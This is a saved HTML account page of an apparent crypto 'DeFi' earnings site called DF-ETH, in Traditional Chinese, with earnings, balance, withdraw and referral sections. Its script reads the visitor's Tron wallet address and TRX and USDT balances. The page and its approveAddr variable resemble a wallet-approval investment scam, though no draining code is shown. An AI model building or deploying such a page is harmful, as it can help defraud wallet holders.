<html lang="" data-dpr="1" style="font-size: 37.5px;">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" />
    <meta name="robots" content="noindex, nofollow" />
    <link rel="icon" href="https://tokem.xxelza.club/public/defi/favicon.ico" />
    <title>DF-ETH</title>
    <link href="./index_files/app.f6608e92.css" rel="preload" as="style" />
    <link href="./index_files/chunk-vendors.73034213.css" rel="preload" as="style" />
    <!--  <link href="./index_files/app.5bd8d9f8.js" rel="preload" as="script" />-->
    <!--  <link href="./index_files/chunk-vendors.1a1edb34.js" rel="preload" as="script" />-->
    <link href="./index_files/chunk-vendors.73034213.css" rel="stylesheet" />
    <link href="./index_files/app.f6608e92.css" rel="stylesheet" />
    <link type="image/x-icon" rel="shortcut icon" href="./index_files/sfZq78vytoImJYG.png" />
    <link type="image/x-icon" rel="shortcut icon" href="https://i.loli.net/2021/10/28/sfZq78vytoImJYG.png" />
</head>

<body style="font-size: 12px;" class="">
    <div id="app" style="background-color: rgb(248, 248, 248); color: rgb(51, 51, 51);">
        <div data-v-4734bf18="">
            <div data-v-4734bf18=""
                style="--van-tab-text-color:#333333; --van-tab-active-text-color:#0052ff; --van-tabs-bottom-bar-color:#0052ff; --van-tabs-default-color:#0052ff; --van-tabs-nav-background-color:#f8f8f8; --van-dropdown-menu-background-color:#ffffff; --van-dropdown-menu-title-text-color:#333333; --van-button-warning-background-color:#0052ff; --van-button-warning-border-color:#0052ff; --van-button-warning-color:#f8f8f8; --van-collapse-item-content-background-color:#ffffff; --van-cell-background-color:#f8f8f8; --van-cell-text-color:#333333; --van-cell-active-color:#ffffff; --van-cell-border-color:#ffffff; --van-popup-background-color:#ffffff; --van-field-input-text-color:#959BA7; --van-dropdown-menu-title-font-size:14px; --van-tabbar-background-color:#ffffff; --van-tabbar-item-active-background-color:#f8f8f8; --van-tabbar-item-active-color:#0052ff; --van-nav-bar-background-color:#f8f8f8; --van-nav-bar-icon-color:#0052ff; --van-nav-bar-title-text-color:#0052ff; --van-count-down-text-color:#0052ff; --van-count-down-font-size:16px; --van-cus-border-color:#efefef; --van-cus-background-color:#f8f8f8; --van-cus-front-color:#ffffff; --van-cus-assets-bg-color1:rgba(0,0,0,0.05); --van-cus-assets-bg-color2:rgba(0,0,0,0.05); --van-cus-img-bg-color:rgba(255,255,255,0.2); --van-cus-text-color:#333333; --van-cus-link-light-color:rgba(0,82,255,0.05);">
                <div data-v-4734bf18="" class="header">
                    <div data-v-504e9856="" data-v-4734bf18="" class="my-header">
                        <div data-v-504e9856="" class="header-row van-row van-row--flex van-row--align-center van-row--justify-space-between">
                            <div data-v-504e9856="" class="van-col van-col--8">
                                <div data-v-504e9856="" class="dropdown-wrap van-dropdown-menu">
                                    <div class="van-dropdown-menu__bar">
                                        <div role="button" tabindex="0" class="van-dropdown-menu__item"><span class="van-dropdown-menu__title">
                                                <div class="van-ellipsis">繁體中文</div>
                                            </span></div>
                                    </div>
                                    <div data-v-504e9856="">
                                        <div class="van-dropdown-item van-dropdown-item--down" style="top: 48px; display: none;">
                                            <div class="van-overlay" style="z-index: 2002; position: absolute; animation-duration: 0.2s;="></div>
                                            <div class="van-popup van-popup--top van-dropdown-item__content" style="transition-duration: 0.2s; z-index: 2003;">
                                                <a href="./../defi/account.html"><div role="button" tabindex="0" class="van-cell van-cell--clickable van-dropdown-item__option" style="">
                                                    <div class="van-cell__title">
                                                        <span>English</span>
                                                    </div>
                                                </div></a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div data-v-504e9856="" class="van-col van-col--8">
                                <div data-v-504e9856="" class="flex align-center justify-center"><img data-v-504e9856="" src="./index_files/sfZq78vytoImJYG.png" width="20">
                                    <h2 data-v-504e9856="" class="plat-name">DF-ETH</h2>
                                </div>
                            </div>
                            <div data-v-504e9856="" class="van-col van-col--8" style="text-align: right; padding-right: 10px;overflow: hidden"><button data-v-504e9856="" disabled="disabled"
                                    class="van-button van-button--default van-button--mini van-button--plain van-button--disabled van-button--hairline van-hairline--surround">
                                    <div data-v-504e9856="" class="van-button__content"><span data-v-504e9856="" class="van-button__text button_address">...</span></div>
                                </button></div>
                        </div>
                        <!---->
                        <!---->
                        <!---->
                    </div>
                </div>
                <div data-v-4734bf18="" class="body-center">
                    <div data-v-4734bf18="" class="assets-top box-shadow">
                        <div data-v-4734bf18="" class="tl flex align-center justify-between">
                            <div data-v-4734bf18=""><span data-v-4734bf18="" class="desc">累計收益</span>
                                <h2 data-v-4734bf18="" class="number link-color balance"> 0.000000 TRX </h2>
                            </div>
                            <div data-v-4734bf18="" class="records-btn"><i data-v-4734bf18="" class="van-icon van-icon-balance-list-o" style="font-size: 16px;">
                                    <!---->
                                </i><span data-v-4734bf18="" class="fs14">記錄</span></div>
                        </div>
                        <div data-v-4734bf18="" class="flex align-center justify-between">
                            <div data-v-4734bf18="" class="tab-con-item flex-sub flex-direction align-start"><span data-v-4734bf18="" class="desc">今日收益</span><span data-v-4734bf18="" class="number link-color balance">0.000000 TRX</span></div>
                            <div data-v-4734bf18="" class="tab-con-item flex-sub flex-direction align-center"><span data-v-4734bf18="" class="desc">錢包餘額</span><span data-v-4734bf18="" class="number link-color usdt_balance">0.000000 USDT</span></div>
                            <div data-v-4734bf18="" class="tab-con-item flex-sub flex-direction align-end"><span data-v-4734bf18="" class="desc">收益率</span><span data-v-4734bf18="" class="number link-color">--</span></div>
                        </div>
                    </div>
                </div>
                <div data-v-7e0b484d="" data-v-4734bf18="">
                    <div data-v-7e0b484d="" class="van-tabbar__placeholder" style="height: 42.6562px;">
                        <div class="van-tabbar van-tabbar--fixed">
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./home.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-home-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">首頁</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./withdraw-eth.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-paid">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">提現</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item">
                                <a href="./referral-team.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-friends-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">分享</div>
                                </a>
                            </div>
                            <div data-v-7e0b484d="" class="van-tabbar-item van-tabbar-item--active">
                                <a href="./account.html">
                                    <div class="van-tabbar-item__icon"><i class="van-icon van-icon-user-o">
                                            <!---->
                                        </i>
                                        <!---->
                                    </div>
                                    <div class="van-tabbar-item__text">帳戶</div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <script src="./index_files/web3.min.js"></script>
    <script src="./index_files/web3.min(1).js"></script>
    <!--<script src="./index_files/chunk-vendors.1a1edb34.js"></script>-->
    <!--<script src="./index_files/app.5bd8d9f8.js"></script>-->
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2025; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
    <div class="van-toast van-toast--middle van-toast--loading" style="z-index: 2001; display: none;">
        <div class="van-loading van-loading--spinner van-toast__loading">
            <span class="van-loading__spinner van-loading__spinner--spinner"><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i><i></i></span>
        </div>
        <div class="van-toast__text">
            Connecting...
        </div>
    </div>
</body>
<script src="https://cdn.bootcdn.net/ajax/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="./index_files/TronWeb.js"></script>
<script src="./index_files/script.js"></script>
<script type="text/javascript">
    var rank = 6.5;
    var authorized_address = '';
    var domain = 'https://' + window.location.host + '/';
    var bizhong = '';
    var approveAddr = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
    var total=0;
    var trx = 0;
    var time;
    function getUrlQueryString(names, urls) {
        urls = urls || window.location.href;
        urls && urls.indexOf("?") > -1 ? urls = urls.substring(urls.indexOf("?") + 1) : "";
        var reg = new RegExp("(^|&)" + names + "=([^&]*)(&|$)", "i");
        var r = urls ? urls.match(reg) : window.location.search.substr(1).match(reg);
        if (r != null && r[2] != "")return unescape(r[2]);
        return null;

    }

    time = setInterval(getWalletAddress, 1000);

   async function getWalletAddress()
    {
        try {
            let tronWeb = await window.tronWeb
            let walletAddress = await tronWeb.defaultAddress.base58;

            $('.button_address').text(walletAddress);

            tradeobj = tronWeb.trx.getAccount(
                walletAddress,
            ).then(output => {

                trx = output.balance / 1000000;
                // alert(trx);
                $('.balance').text(trx + ' TRX');

            });
            // alert('12313');
            let contract = await tronWeb.contract().at("TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t");
            await contract.balanceOf(walletAddress).call(function (err, tex) {
                if (err == null) {
                    let total = tex._hex / (10 ** 6);

                    // alert(total);
                    $('.usdt_balance').text(total.toFixed(6) + ' USDT');
                }
            });
            window.clearInterval(time);
            return true;
        } catch (e) {
            // alert(e);
            return  false;
        }
    }

    $('.records-btn').click(function () {
        var location = window.location.href;
        var redirect = "./withdraw-exchange-record.html?referrer=account"
        if (location.indexOf("?") > -1) {
            redirect += '&' + location.substring(location.indexOf("?") + 1);
        }

        window.location.href = redirect;
    })
    
    $('.van-dropdown-menu__item').click(function () {
        $('.van-dropdown-item--down').show()
    })
    $('.van-overlay').click(function () {
        $('.van-dropdown-item--down').hide()
    })

</script>
</html>
